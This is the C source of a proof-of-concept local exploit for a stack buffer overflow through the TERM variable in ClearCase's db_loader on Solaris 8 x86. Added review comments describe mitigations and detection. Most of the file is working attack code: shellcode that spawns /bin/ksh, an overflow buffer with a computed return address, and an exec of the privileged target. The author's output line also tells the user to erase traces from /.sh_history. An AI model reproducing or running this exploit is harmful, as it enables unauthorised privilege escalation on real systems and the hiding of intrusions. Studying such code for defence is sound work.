/*
 * Exploit code for ClearCase db_loader $TERM overflow on Solaris x86
 * Test on Solaris 8 x86.
 * By virtualcat@xfocus.org
 *
 * NOTE(review): historical proof-of-concept, kept as reference for the
 * classic "oversized environment variable -> stack buffer overflow" pattern.
 * What the code below demonstrates (and only that): it builds a single
 * environment string "TERM=<shellcode><0x41 padding><return address>" of
 * BUF_LEN bytes and exec()s the target with it.  The vulnerable program is
 * presumably copying TERM into a fixed-size buffer without a length check --
 * confirm against the vendor advisory.
 *
 * Defensive relevance:
 *  - Remediation is a patched db_loader; the /.sh_history remark below
 *    suggests the target runs with elevated privileges, so dropping
 *    setuid/setgid bits on unpatched builds is the stop-gap (verify the
 *    installed file mode).
 *  - The payload relies on executing code placed on the user stack; the
 *    Solaris noexec_user_stack tunable (/etc/system) is the platform
 *    mitigation for this class -- confirm it applies to the build in use.
 *  - Detection: an exec of db_loader whose environment carries a TERM value
 *    of roughly BUF_LEN bytes dominated by a long run of 0x41 is the
 *    observable artefact this program produces.
 */

/* You may need to modify this macro accordingly with your system */
#define EXECUTABLE "/usr/atria/sol_x86/etc/db_loader"
//#define EXECUTABLE "db_loader"
#define MAGIC_STRING "TERM="
#define BUF_LEN 559
#define USER_UPPER 0x8047fff // Solaris 8 x86's magic (author's value; presumably the top of the user stack -- confirm)

/*
 * Buffer will be constructed as the following (layout reconstructed from the
 * code in main(); offsets are bytes from bufPtr):
 *
 *   +-------+------------------+---------------------+-----------+
 *   | TERM= | shellCode bytes  | 0x41 0x41 ... 0x41  | retAddr   |
 *   +-------+------------------+---------------------+-----------+
 *   0       5                  5+strlen(shellCode)   BUF_LEN-4   BUF_LEN
 *
 * The 0x41 padding is sized so the string is exactly BUF_LEN bytes; the last
 * four bytes of that padding are then overwritten with retAddr.
 */

/* lsd's shellcode (author's annotation; the disassembly comments are the author's) */
char shellCode[] =
    "\x33\xc0"                 /* xorl %eax,%eax */
    "\xeb\x08"                 /* jmp */
    "\x5f"                     /* popl %edi */
    "\x47"                     /* incl %edi */
    "\xab"                     /* stosl %eax,%es:(%edi) */
    "\x88\x47\x01"             /* movb %al,0x1(%edi) */
    "\xeb\x0d"                 /* jmp */
    "\xe8\xf3\xff\xff\xff"     /* call */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                     /* ret */
    "\x33\xc0"                 /* xorl %eax,%eax */
    "\x50"                     /* pushl %eax */
    "\xb0\x17"                 /* movb $0x17,%al */
    "\xe8\xee\xff\xff\xff"     /* call */
    "\xeb\x16"                 /* jmp */
    "\x33\xd2"                 /* xorl %edx,%edx */
    "\x58"                     /* popl %eax */
    "\x8d\x78\x14"             /* leal 0x14(%eax),edi */
    "\x52"                     /* pushl %edx */
    "\x57"                     /* pushl %edi */
    "\x50"                     /* pushl %eax */
    "\xab"                     /* stosl %eax,%es:(%edi) */
    "\x92"                     /* xchgl %eax,%edx */
    "\xab"                     /* stosl %eax,%es:(%edi) */
    "\x88\x42\x08"             /* movb %al,0x7(%edx) */
    "\xb0\x3b"                 /* movb $0x3b,%al */
    "\xe8\xd6\xff\xff\xff"     /* call */
    "\xe8\xe5\xff\xff\xff"     /* call */
    "/bin/ksh";

/*
 * Builds the single TERM= environment string described above, computes the
 * return address from USER_UPPER and the sizes of the strings placed on the
 * initial stack, then replaces this process with EXECUTABLE via execle().
 *
 * argc/argv are unused.  Returns 0 both after a failed execle() (the error is
 * reported with perror) and when malloc() fails.
 */
int main(int argc, char** argv)
{
    char* envp[2];                /* {TERM string, NULL} handed to execle() */
    char* charPtr = 0;            /* write cursor inside bufPtr */
    char* bufPtr = 0;             /* the BUF_LEN+1 byte payload buffer */
    int len;                      /* loop index, then total size of the exec-time strings */
    int retAddr;                  /* address written over the saved return slot */

    bufPtr = (char *) malloc(BUF_LEN+1);
    if(bufPtr != 0) {
        /* "TERM=" prefix so the kernel/libc treats the string as the TERM variable */
        strcat(bufPtr, MAGIC_STRING);
        charPtr = bufPtr + strlen(MAGIC_STRING);
        /* byte-for-byte copy of shellCode (without its trailing NUL) after the prefix */
        for(len=0; len < strlen(shellCode); len++) {
            *charPtr++ = shellCode[len];
        }
        /* fill the rest of the BUF_LEN bytes with 0x41 ('A') padding */
        memset(charPtr, 0x41, BUF_LEN - strlen(MAGIC_STRING) - strlen(shellCode));

        /*
         * Per the author's comments: total size of the strings the kernel
         * places at the top of the new process's stack on exec -- argv[0],
         * the environment string, the platform name and the executable path
         * (each NUL-terminated).
         */
        len = 8                              // Length of the dummy argv0 "1234567"
            + 1 + BUF_LEN + 1                // Length of the TERM environment variable buffer
            + 1 + 6                          // Length of "i86pc"
            + 1 + strlen(EXECUTABLE)+1;      // Length of the path of the executable

        /* walk down from the stack top by the aligned size of those strings, then back up to where the payload starts */
        retAddr = USER_UPPER                                   // Solaris x86's magic
            - 4                                                // Reserved bytes - always be 0
            - ((len%4) == 0 ? len:len+(4-len%4))               // The 4 bytes alignment
            + 8                                                // Space for argv0 "1234567"
            + 5                                                // Space for "TERM="
            + 1;                                               // One byte ajustment

        /* last 4 bytes of the payload become the return address (assumes a 4-byte int on this 32-bit target) */
        *((int *) (bufPtr + BUF_LEN - 4)) = retAddr;
        /* NUL written at offset BUF_LEN + 1; presumably meant as the string terminator */
        *(bufPtr + BUF_LEN + 1) = 0;

        /* the payload is the only environment entry the target receives */
        envp[0] = bufPtr;
        envp[1] = 0;

        printf("Jumping to 0x%.8x ... \n", retAddr);
        printf("Don't forget to clean your foot steps in /.sh_history. Have fun! ;)\n");
        /* argv = {"1234567", NULL}; execle() only returns on failure */
        execle(EXECUTABLE, "1234567", 0, envp);
        perror("execle");
    } else {
        printf("No more free memory!\n");
    }
    return 0;
}